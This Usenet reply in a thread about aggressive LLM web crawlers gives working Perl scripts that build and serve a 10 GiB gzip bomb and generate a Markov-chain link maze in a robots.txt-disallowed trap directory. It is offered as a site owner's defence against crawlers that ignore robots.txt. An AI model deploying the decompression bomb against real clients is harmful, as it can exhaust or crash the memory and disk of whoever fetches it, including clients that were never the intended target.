Path: ...!eternal-september.org!feeder3.eternal-september.org!news.eternal-september.org!eternal-september.org!.POSTED!not-for-mail
From: anthk <anthk@openbsd.home>
Newsgroups: comp.misc
Subject: Re: bad bot behavior
Date: Mon, 12 May 2025 06:24:45 -0000 (UTC)
Organization: A noiseless patient Spider
Lines: 32
Message-ID: <slrn101ue1g.198p.anthk@openbsd.home.localhost>
References: <vrc2r4$2okrp$1@dont-email.me> <vrc8qm$2tkq5$1@dont-email.me>
 <20250318182006.00006ae3@dne3.net>
Injection-Date: Mon, 12 May 2025 08:24:45 +0200 (CEST)
Injection-Info: dont-email.me; posting-host="cc7a24369ce4842ffee3a5ba377d97da";
	logging-data="1014028"; mail-complaints-to="abuse@eternal-september.org";	posting-account="U2FsdGVkX1+tzbhHTU57ue/8soSDLNxD"
User-Agent: slrn/1.0.3 (OpenBSD)
Cancel-Lock: sha1:KQ8Fc6xv7OEQmw40qIaatWrKVlo=
Bytes: 2193

On 2025-03-18, Toaster <toaster@dne3.net> wrote:
> On Tue, 18 Mar 2025 12:00:07 -0500
> D Finnigan <dog_cow@macgui.com> wrote:
>
>> On 3/18/25 10:17 AM, Ben Collver wrote:
>> > Please stop externalizing your costs directly into my face
>> > ==========================================================
>> > March 17, 2025 on Drew DeVault's blog
>> > 
>> > Over the past few months, instead of working on our priorities at
>> > SourceHut, I have spent anywhere from 20-100% of my time in any
>> > given week mitigating hyper-aggressive LLM crawlers at scale.
>> 
>> This is happening at my little web site, and if you have a web site, 
>> it's happening to you too. Don't be a victim.
>> 
>> Actually, I've been wondering where they're storing all this data;
>> and how much duplicate data is stored from separate parties all
>> scraping the web simultaneously, but independently.
>
> But what can be done to mitigate this issue? Crawlers and bots ruin the
> internet.
>

Gzip bombs + fake links = profit. Remember that gzip-compressed pages are
part of the HTTP standard (Content-Encoding: gzip); even lynx can
decompress them natively.
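
A rough sketch of that first half in Perl (the bomb.gz name, the 10 GiB
size and the CGI setup are only made-up examples, not anyone's actual
setup): build the bomb once, then let a CGI hand it to whatever follows
your fake links.

#!/usr/bin/env perl
# make-bomb.pl -- write a small bomb.gz that inflates to 10 GiB of zeros
use strict;
use warnings;
use IO::Compress::Gzip qw(gzip $GzipError);

open my $out, '>:raw', 'bomb.gz' or die "bomb.gz: $!";
my $gz = IO::Compress::Gzip->new($out, Level => 9) or die $GzipError;
my $chunk = "\0" x (1024 * 1024);        # 1 MiB of zeros
$gz->print($chunk) for 1 .. 10 * 1024;   # 10 GiB before compression
$gz->close;

#!/usr/bin/env perl
# bomb.cgi -- serve bomb.gz as an ordinary page; any client that honors
# Content-Encoding: gzip will try to inflate the whole 10 GiB
use strict;
use warnings;

binmode STDOUT, ':raw';
print "Content-Type: text/html\r\n",
      "Content-Encoding: gzip\r\n\r\n";
open my $fh, '<:raw', 'bomb.gz' or die "bomb.gz: $!";
local $/ = \65536;                       # copy in 64 KiB chunks
print while <$fh>;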

Also, MegaHAL/Hailo under Perl: feed it nonsense, and create some
non-visible content under a robots.txt-disallowed directory, full of
Markov-chain-generated nonsense and gzip bombs.
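
And a sketch of the second half (Hailo is on CPAN; corpus.txt,
nonsense.sqlite and the /trap/ directory are made-up names): seed the
Markov brain with whatever text you have lying around, dump junk pages
into the disallowed directory, and point a hidden link at it from your
real pages so only crawlers that ignore robots.txt ever find it.

robots.txt, so well-behaved crawlers never enter the trap:

  User-agent: *
  Disallow: /trap/

#!/usr/bin/env perl
# spew.pl -- fill the disallowed directory with Markov-chain junk
use strict;
use warnings;
use Hailo;

my $hailo = Hailo->new(brain => 'nonsense.sqlite');
$hailo->train('corpus.txt');             # any text will do, quality is irrelevant

mkdir 'trap' unless -d 'trap';
for my $n (1 .. 200) {
    open my $fh, '>', "trap/page$n.html" or die $!;
    print {$fh} "<html><body>\n";
    print {$fh} '<p>', ($hailo->reply('crawler') // ''), "</p>\n" for 1 .. 40;
    # every junk page links to the next one, so the bot keeps digging
    my $next = $n + 1;
    print {$fh} qq{<a href="/trap/page$next.html">more</a>\n};
    print {$fh} "</body></html>\n";
    close $fh;
}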